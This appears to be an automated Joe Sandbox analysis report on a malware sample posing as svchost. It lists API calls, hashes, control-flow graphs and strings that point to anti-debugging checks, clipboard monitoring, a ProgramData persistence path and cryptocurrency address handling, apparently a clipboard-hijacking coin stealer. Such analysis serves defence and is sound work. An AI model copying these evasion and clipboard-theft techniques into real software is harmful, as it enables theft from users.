                                      • Instruction ID: 283a584ac4493401d37b65e144df0ac759d1c493dcd86ba3b9ae389d4cc3117d
                                      • Opcode Fuzzy Hash: 938599bffe4c1af892667c408258da0dbef6e56edbcb903562bc19fef294f7be
                                      • Instruction Fuzzy Hash: 440181B0E4420CBBDF10AFF09C0DBDE7B789B04709F1040BAE501B22E1D6785644DB6A

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                      • GetCurrentThread.KERNEL32 ref: 004010E2
                                      • NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      Strings
                                      Similarity
                                      • API ID: Thread$AddressCurrentHandleInformationModuleProc
                                      • String ID: 7=-55V-55$v={.=q7/8;6*=287|1;.*-
                                      • API String ID: 119525482-1927140540
                                      • Opcode ID: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction ID: 0b82ffc8d0ca1f8d0bdf6dd75ae4657ab6c6ae2d9d09e3d18241b6bc1c87c415
                                      • Opcode Fuzzy Hash: 2435a75c996f34b6889767234aba8995ae01aaa7964b36a464df7492c5cc838d
                                      • Instruction Fuzzy Hash: 69016DB4D40308BBDB10AFA0DC4A7DE7B74AB08706F10C07AA945626D1D6785A84DB5A

                                      Control-flow Graph

                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040E264
                                      • GetClassInfoA.USER32(00000000,00000000,?), ref: 0040E28B
                                      • RegisterClassA.USER32(00000000), ref: 0040E29F
                                      • CreateWindowExA.USER32(00000000,00000000,0041CCD4,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0040E2F8
                                      • ShowWindow.USER32(00000000,00000000), ref: 0040E30D
                                      • UnregisterClassA.USER32(00000000,00000000), ref: 0040E325
                                      Similarity
                                      • API ID: Class$Window$CreateHandleInfoModuleRegisterShowUnregister
                                      • String ID:
                                      • API String ID: 801957319-0
                                      • Opcode ID: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction ID: a965deb00f86eced1c550541a2bb8782c69ddf198977c8bb291b1a06dc78ae28
                                      • Opcode Fuzzy Hash: caccaf7d217365975b2b1e3a55c07ed66ec34c7c539f4e702f45ef9cbd056241
                                      • Instruction Fuzzy Hash: 3B411B74D04209EFDB50CFA9D844BEEBBB5BB48300F14846EE919B7280D7789961CF69

                                      Control-flow Graph

                                      APIs
                                      • _malloc.LIBCMT ref: 0040EFEB
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • std::exception::exception.LIBCMT ref: 0040F020
                                      • std::exception::exception.LIBCMT ref: 0040F03A
                                      • __CxxThrowException@8.LIBCMT ref: 0040F04B
                                      Similarity
                                      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                      • String ID:
                                      • API String ID: 615853336-0
                                      • Opcode ID: fbad043f0e74b480cd2cc0079a4bacdacac9609b018db1ef7578698261e708b7
                                      • Instruction ID: 1e2d0527fb0d68fa3bcd4beffa05bed18b15ee7e689a91fba965b1ab2acf346e
                                      • Opcode Fuzzy Hash: fbad043f0e74b480cd2cc0079a4bacdacac9609b018db1ef7578698261e708b7
                                      • Instruction Fuzzy Hash: 5101473550020A66CB10E757D802AEEBBE99B80358F14007FF400A21D3DB79AA92CA8D

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00401090: GetModuleHandleA.KERNEL32(00000000), ref: 004010A4
                                        • Part of subcall function 00401090: GetProcAddress.KERNEL32(00000000,00000000), ref: 004010C5
                                        • Part of subcall function 00401090: NtSetInformationThread.NTDLL(?,00000011,00000000,00000000), ref: 004010F5
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                      • _wcsrchr.LIBCMT ref: 0040DE5E
                                      • SetCurrentDirectoryW.KERNELBASE(?), ref: 0040DE7E
                                      • SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Module$AddressCurrentDirectoryErrorFileHandleInformationModeNameProcThread_wcsrchr
                                      • String ID:
                                      • API String ID: 1734398998-0
                                      • Opcode ID: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction ID: d51f74107fde24b1b44d4026587f8350a487b3b151098653a9adb7166d01a02a
                                      • Opcode Fuzzy Hash: 857e7daad55e3966da8993c541fa6c9fdcddb044e01855e595ba07532dd17d0c
                                      • Instruction Fuzzy Hash: FC016770D002089BE750DFB1DD06BED7774AF08705F00407DA745B61D1EE759A55CB69

                                      Control-flow Graph

                                      control_flow_graph 275 40e4b0-40e4c7 276 40e4c9-40e4d1 275->276 277 40e4df-40e4e1 275->277 276->277 278 40e4d3-40e4d7 276->278 279 40e53e-40e541 277->279 278->277 280 40e4d9-40e4dd 278->280 280->277 281 40e4e3-40e503 CreateFileW 280->281 282 40e505-40e507 281->282 283 40e509-40e53b ReadFile CloseHandle 281->283 282->279 283->279
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040E4F6
                                      • ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E51B
                                      • CloseHandle.KERNEL32(000000FF), ref: 0040E52D
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleRead
                                      • String ID:
                                      • API String ID: 1035965006-0
                                      • Opcode ID: 25b86b350a1d5725d5ef31d7189108e058dca359b1a55ff52c9e9582d333e8df
                                      • Instruction ID: 08e041bf8671aa807d449c44a376e0531f72ea10ffa7659b1e9f716e124a0f61
                                      • Opcode Fuzzy Hash: 25b86b350a1d5725d5ef31d7189108e058dca359b1a55ff52c9e9582d333e8df
                                      • Instruction Fuzzy Hash: 9C116D34A04208FBDF20CFA5D845BEA77B9AF49304F1085A9F915672C0D7799A24CB65

                                      Control-flow Graph

                                      control_flow_graph 284 40df97-40dfb0 call 40de20 287 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 284->287 288 40dfe2 287->288 289 40dfdc-40dfe0 287->289 290 40dfe2 call 40d7f0 288->290 289->288 291 40dfec-40dff0 289->291 292 40dfe7 290->292 293 40dff6-40e00c call 40f476 291->293 294 40e0ab-40e0af 291->294 292->294 300 40e04e-40e064 call 40f476 293->300 301 40e00e-40e019 293->301 296 40e0b1-40e0b5 LocalFree 294->296 297 40e0bb-40e119 294->297 296->297 308 40e0a6 300->308 309 40e066-40e071 300->309 302 40e01b-40e031 call 40f476 301->302 303 40e03c-40e044 call 405b10 301->303 302->303 315 40e033-40e039 302->315 311 40e049-40e04c 303->311 314 40e0a6 call 40d7f0 308->314 312 40e073-40e089 call 40f476 309->312 313 40e094-40e0a4 call 405e10 309->313 311->294 312->313 320 40e08b-40e091 312->320 313->294 314->294 315->303 320->313
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNELBASE(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction ID: 8b7a6b8f356ce4702e62b5b31cb6d48a6c6ddf238daab223e574e510f6bfc381
                                      • Opcode Fuzzy Hash: 042f7be7ee89fd1085477983af551a410b2ae299cdc2ed00dde61f87e02e1ac2
                                      • Instruction Fuzzy Hash: 52010471D04219CBDB24DFE5D9087EEBBB4FB08315F20862AD402B22D0C77D591ADB6A

                                      Control-flow Graph

                                      control_flow_graph 321 40dfa6-40dfb0 call 40de20 324 40dfb5-40dfda GetCommandLineW CommandLineToArgvW 321->324 325 40dfe2 324->325 326 40dfdc-40dfe0 324->326 327 40dfe2 call 40d7f0 325->327 326->325 328 40dfec-40dff0 326->328 329 40dfe7 327->329 330 40dff6-40e00c call 40f476 328->330 331 40e0ab-40e0af 328->331 329->331 337 40e04e-40e064 call 40f476 330->337 338 40e00e-40e019 330->338 333 40e0b1-40e0b5 LocalFree 331->333 334 40e0bb-40e119 331->334 333->334 345 40e0a6 337->345 346 40e066-40e071 337->346 339 40e01b-40e031 call 40f476 338->339 340 40e03c-40e044 call 405b10 338->340 339->340 352 40e033-40e039 339->352 348 40e049-40e04c 340->348 351 40e0a6 call 40d7f0 345->351 349 40e073-40e089 call 40f476 346->349 350 40e094-40e0a4 call 405e10 346->350 348->331 349->350 357 40e08b-40e091 349->357 350->331 351->331 352->340 357->350
                                      APIs
                                        • Part of subcall function 0040DE20: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 0040DE4B
                                        • Part of subcall function 0040DE20: _wcsrchr.LIBCMT ref: 0040DE5E
                                        • Part of subcall function 0040DE20: SetCurrentDirectoryW.KERNELBASE(?), ref: 0040DE7E
                                        • Part of subcall function 0040DE20: SetErrorMode.KERNELBASE(00008003), ref: 0040DE89
                                      • GetCommandLineW.KERNEL32(00000000), ref: 0040DFBC
                                      • CommandLineToArgvW.SHELL32(?,00000000), ref: 0040DFCD
                                      • __wcsicoll.LIBCMT ref: 0040E002
                                      • __wcsicoll.LIBCMT ref: 0040E027
                                      • LocalFree.KERNEL32(00000000), ref: 0040E0B5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CommandLine__wcsicoll$ArgvCurrentDirectoryErrorFileFreeLocalModeModuleName_wcsrchr
                                      • String ID:
                                      • API String ID: 376514278-0
                                      • Opcode ID: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction ID: ae0a6c04ace250e6ec1f5edccdaa0bc9745cba344c46f71d870c8753c6498d62
                                      • Opcode Fuzzy Hash: 0c1f40a89095485505fd396e34828f8e9ff31bf2fc1e7971dde13b94f3ebcb04
                                      • Instruction Fuzzy Hash: 2E014471C04218CBDB24DFE5D8087EEBBB4FB08315F10422AD802B3280C77D5919CBAA

                                      Control-flow Graph

                                      control_flow_graph 358 4014a0-4014b7 GetCurrentProcess CheckRemoteDebuggerPresent 359 4014c2 358->359 360 4014b9-4014c0 358->360 361 4014c4-4014c7 359->361 360->361
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?), ref: 004014A8
                                      • CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 004014AF
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: CheckCurrentDebuggerPresentProcessRemote
                                      • String ID:
                                      • API String ID: 3244773808-0
                                      • Opcode ID: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction ID: 65bc4ce697b09d766b27661658b024bedcce05a3cc3625d10305c865c1bed5cd
                                      • Opcode Fuzzy Hash: 2a967ada78a2ab3b4a1292265fbf65d9d587c0a9198b8703d3f526cd3a6db7a4
                                      • Instruction Fuzzy Hash: 6BD0A732505208FBCF10DFF19C0DAEE77ECEB05301F0441B6A805921A0D678CB14E676
                                      APIs
                                        • Part of subcall function 00401180: GetModuleHandleA.KERNEL32(00000000), ref: 0040119B
                                        • Part of subcall function 00401180: GetProcAddress.KERNEL32(00000000,00000000), ref: 004011BC
                                        • Part of subcall function 00401180: GetCurrentProcess.KERNEL32(0000001E,00000000,00000004,00000000), ref: 004011D5
                                        • Part of subcall function 00401180: NtQueryInformationProcess.NTDLL(00000000), ref: 004011DC
                                      • ExitProcess.KERNEL32 ref: 00401511
                                        • Part of subcall function 00401200: GetModuleHandleA.KERNEL32(00000000), ref: 0040121B
                                        • Part of subcall function 00401200: GetProcAddress.KERNEL32(00000000,00000000), ref: 0040123C
                                        • Part of subcall function 00401200: GetCurrentProcess.KERNEL32(0000001F,00000000,00000004,00000000), ref: 00401255
                                        • Part of subcall function 00401200: NtQueryInformationProcess.NTDLL(00000000), ref: 0040125C
                                        • Part of subcall function 004014A0: GetCurrentProcess.KERNEL32(?), ref: 004014A8
                                        • Part of subcall function 004014A0: CheckRemoteDebuggerPresent.KERNELBASE(00000000), ref: 004014AF
                                        • Part of subcall function 004013F0: _memset.LIBCMT ref: 0040141B
                                        • Part of subcall function 004013F0: GetCurrentThread.KERNEL32 ref: 00401434
                                        • Part of subcall function 004013F0: GetThreadContext.KERNEL32(00000000), ref: 0040143B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Process$Current$AddressHandleInformationModuleProcQueryThread$CheckContextDebuggerExitPresentRemote_memset
                                      • String ID:
                                      • API String ID: 4175358967-0
                                      • Opcode ID: 3c0c4aa8033a52a8745ea1f515c5c70d635903a19c692f71d8548e65835fc8ba
                                      • Instruction ID: d4825ca4a1344b9428fc6eb4c4397339609c168b71d01e32b5fecf6a8fec44f5
                                      • Opcode Fuzzy Hash: 3c0c4aa8033a52a8745ea1f515c5c70d635903a19c692f71d8548e65835fc8ba
                                      • Instruction Fuzzy Hash: D9F0549450527731EA5E36A7181223F20851DD578E784407FB887BC5F7EE7CC40910BD
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset$FileModuleName_wcsrchr
                                      • String ID: " --run$.exe$C:\ProgramData$D
                                      • API String ID: 4110263760-856358560
                                      • Opcode ID: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction ID: 5e5d0b140630b177179d526cbad5a59638b82476de5506c4c87b912bd79cfa18
                                      • Opcode Fuzzy Hash: 950a9b0d5e19babd959c84d076f819a4769d06f360780ed7d77a3cdf4963b18b
                                      • Instruction Fuzzy Hash: 80F15271E443189BDB20DF60CC45BEAB774AF49704F0081E9E20DB6681EBB55AD8CF5A
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004053DB
                                      • IsClipboardFormatAvailable.USER32(0000000D), ref: 0040540A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AvailableClipboardCountFormatTick
                                      • String ID:
                                      • API String ID: 2629628197-0
                                      • Opcode ID: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction ID: e3f2d7c064d7d99d206c5680652346840c7ffd9ef1d315a872dd3332421114f8
                                      • Opcode Fuzzy Hash: ea5d661e767c446a57565c884fad5e5dc5843c3bfe645af674496e95f4a1b0b0
                                      • Instruction Fuzzy Hash: 84914A71D00218DFCB14DFAAD848AEFBBB5FF48305F10856AE51AA7290D7389945CF29
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 0040F928
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040F93D
                                      • UnhandledExceptionFilter.KERNEL32(0041A294), ref: 0040F948
                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040F964
                                      • TerminateProcess.KERNEL32(00000000), ref: 0040F96B
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                      • String ID:
                                      • API String ID: 2579439406-0
                                      • Opcode ID: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction ID: 88087e6288b79e792aea48af548dc1751c073badf06254871cafe7bc60af0824
                                      • Opcode Fuzzy Hash: 2a36ec2ab83c16955cc5836c583923e5e3699b02141c902a31b1dee5174e0471
                                      • Instruction Fuzzy Hash: C221D6B4A02308DFD720EF65F8496957BE0FB48304F90903AE50993663D7B45596CF9D
                                      APIs
                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040F780), ref: 00410691
                                      • __mtterm.LIBCMT ref: 0041069D
                                        • Part of subcall function 004103D6: DecodePointer.KERNEL32(00000005,004107FF,?,0040F780), ref: 004103E7
                                        • Part of subcall function 004103D6: TlsFree.KERNEL32(0000000C,004107FF,?,0040F780), ref: 00410401
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,004107FF,?,0040F780), ref: 004125E8
                                        • Part of subcall function 004103D6: _free.LIBCMT ref: 004125EB
                                        • Part of subcall function 004103D6: DeleteCriticalSection.KERNEL32(0000000C,76EF5810,?,004107FF,?,0040F780), ref: 00412612
                                      • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004106B3
                                      • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004106C0
                                      • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004106CD
                                      • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004106DA
                                      • TlsAlloc.KERNEL32(?,0040F780), ref: 0041072A
                                      • TlsSetValue.KERNEL32(00000000,?,0040F780), ref: 00410745
                                      • __init_pointers.LIBCMT ref: 0041074F
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410760
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041076D
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 0041077A
                                      • EncodePointer.KERNEL32(?,0040F780), ref: 00410787
                                      • DecodePointer.KERNEL32(0041055A,?,0040F780), ref: 004107A8
                                      • __calloc_crt.LIBCMT ref: 004107BD
                                      • DecodePointer.KERNEL32(00000000,?,0040F780), ref: 004107D7
                                      • GetCurrentThreadId.KERNEL32 ref: 004107E9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                      • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                      • API String ID: 3698121176-3819984048
                                      • Opcode ID: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction ID: 40795ae181cca19bb6142b5e762f73122f3cfe54ebf09a24129c268063ec4741
                                      • Opcode Fuzzy Hash: bd38d10914e9f58c4cef53f4dde5dc1812db3411cc6896fc4dcebcca636284c2
                                      • Instruction Fuzzy Hash: 0B319A30A01210ABC731AFB5AC156967EE0EB44725B504537E928C32F1D7B8A5D2CF5D
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _strncmp
                                      • String ID: *07=JWdp$7$=$J$W$bitcoincash:$d$p$|
                                      • API String ID: 909875538-3576240675
                                      • Opcode ID: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction ID: ecf531c9375a07a423a8c1e4a6a4c70633f4976ddfcbcebe6c6e4547d44ee2d2
                                      • Opcode Fuzzy Hash: 8f2e373312d36219b60b9a5a7e1854ab49ea109c15ca698b580d7241a04ca57f
                                      • Instruction Fuzzy Hash: 29A17170A082A8DADF25CB25C8507EEBBB1AF42304F1480DAD48E7B382C6795F94DF55
                                      APIs
                                      • MessageBoxA.USER32(00000000,?,00000000,?), ref: 00401B8F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Message
                                      • String ID: Configuration loaded from $INVALID ADDRESSES:$No config info found$VALID ADDRESSES:$k;B9=8prHYVXTHk87/20Hn25.Hz.98;=
                                      • API String ID: 2030045667-921656899
                                      • Opcode ID: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction ID: f26b0750d2dd7497bc4d0c1e5d1dca22003d29cf30daf5b63e4976072f097509
                                      • Opcode Fuzzy Hash: a4f6f7a70e75182b8535afc958e6263b5f271b17888e7c424a2e56989852f6f4
                                      • Instruction Fuzzy Hash: C1912970E442889FDB14CFA8C891BEDBBB1BF45308F14819AD1597B386C7746886CF59
                                      APIs
